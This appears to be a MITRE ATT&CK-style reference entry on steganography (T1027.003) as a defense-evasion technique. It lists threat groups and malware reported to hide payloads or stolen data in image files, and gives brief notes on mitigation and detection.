Obfuscated Files or Information: Steganography

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

Duqu was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.[1]

By the end of 2017, a threat group used Invoke-PSImage to hide PowerShell commands in an image file (.png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.[2]

ID: T1027.003
Sub-technique of:  T1027
Tactic: Defense Evasion
Platforms: Linux, Windows, macOS
Data Sources: Binary file metadata
Version: 1.0
Created: 05 February 2020
Last Modified: 08 June 2020

Procedure Examples

Name Description

ABK can extract a malicious Portable Executable (PE) from a photo.[5]


APT37 uses steganography to send images to users that are embedded with shellcode.[6][7]


Avenger can extract backdoor malware from downloaded images.[5]


BBK can extract a malicious Portable Executable (PE) from a photo.[5]


BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.[5]


build_downer can extract malware from a downloaded JPEG.[5]


MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.[8]


Okrum's payload is encrypted and embedded within its loader, or within a legitimate PNG file.[4]


PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).[3]

Tropic Trooper

Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.[9]


This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.


Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.